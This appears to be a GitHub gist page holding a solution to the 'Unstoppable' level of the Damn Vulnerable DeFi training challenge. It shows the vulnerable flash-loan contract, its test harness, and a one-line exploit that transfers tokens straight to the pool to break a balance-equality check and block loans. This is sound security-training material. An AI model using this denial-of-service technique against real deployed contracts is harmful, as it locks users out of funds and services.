Skip to content

Instantly share code, notes, and snippets.

View iphelix's full-sized avatar

Peter Kacherginsky iphelix

View GitHub Profile
@iphelix
iphelix / damn_vuln_defi_0.sh
Last active November 14, 2020 19:37
Damn Vulnerable DeFi - Setup
% npm run
Lifecycle scripts included in :
test
npm run compile && npx mocha --timeout 5000 --exit --recursive test
available via `npm run-script`:
unstoppable
npm run compile && npx mocha --timeout 5000 --exit test/unstoppable/unstoppable.challenge.js
truster
npm run compile && npx mocha --timeout 5000 --exit test/truster/truster.challenge.js
@iphelix
iphelix / unstoppable6.sh
Last active November 13, 2020 23:24
Damn Vulnerable DeFi - Unstoppable
% npm run unstoppable
...
[Challenge] Unstoppable
✓ Exploit (66ms)
1 passing (3s)
@iphelix
iphelix / unstoppable5.sol
Last active November 13, 2020 23:24
Damn Vulnerable DeFi - Unstoppable
it('Exploit', async function () {
/** YOUR EXPLOIT GOES HERE */
await this.token.transfer(this.pool.address, INITIAL_ATTACKER_BALANCE, {from: attacker });
});
@iphelix
iphelix / unstoppable4.sol
Last active November 13, 2020 23:24
Damn Vulnerable DeFi - Unstoppable
IERC20 public damnValuableToken;
uint256 public poolBalance;
constructor(address tokenAddress) public {
require(tokenAddress != address(0), "Token address cannot be zero");
damnValuableToken = IERC20(tokenAddress);
}
function depositTokens(uint256 amount) external nonReentrant {
require(amount > 0, "Must deposit at least one token");
@iphelix
iphelix / unstoppable0.sh
Last active November 13, 2020 23:26
Damn Vulnerable DeFi - Unstoppable
% npm run unstoppable
...
[Challenge] Unstoppable
✓ Exploit
1) "after all" hook for "Exploit"
1 passing (3s)
1 failing
@iphelix
iphelix / unstoppable1.js
Last active November 13, 2020 23:25
Damn Vulnerable DeFi - Unstoppable
it('Exploit', async function () {
/** YOUR EXPLOIT GOES HERE */
});
after(async function () {
/** SUCCESS CONDITION */
await expectRevert.unspecified(
this.receiverContract.executeFlashLoan(10, { from: someUser })
);
});
@iphelix
iphelix / unstoppable2.sol
Last active November 13, 2020 23:25
Damn Vulnerable DeFi - Unstoppable
function executeFlashLoan(uint256 amount) external {
require(msg.sender == owner, "Only owner can execute flash loan");
pool.flashLoan(amount);
}
@iphelix
iphelix / unstoppable3.sol
Last active November 13, 2020 23:25
Damn Vulnerable DeFi - Unstoppable
function flashLoan(uint256 borrowAmount) external nonReentrant {
require(borrowAmount > 0, "Must borrow at least one token");
uint256 balanceBefore = damnValuableToken.balanceOf(address(this));
require(balanceBefore >= borrowAmount, "Not enough tokens in pool");
// Ensured by the protocol via the `depositTokens` function
assert(poolBalance == balanceBefore);
damnValuableToken.transfer(msg.sender, borrowAmount);

Keybase proof

I hereby claim:

  • I am iphelix on github.
  • I am iphelix (https://keybase.io/iphelix) on keybase.
  • I have a public key ASBTq-aZQMXn21DK4JKw5_atUa0QwLExFaLZ8zvDhaDOZQo

To claim this, I am signing this object: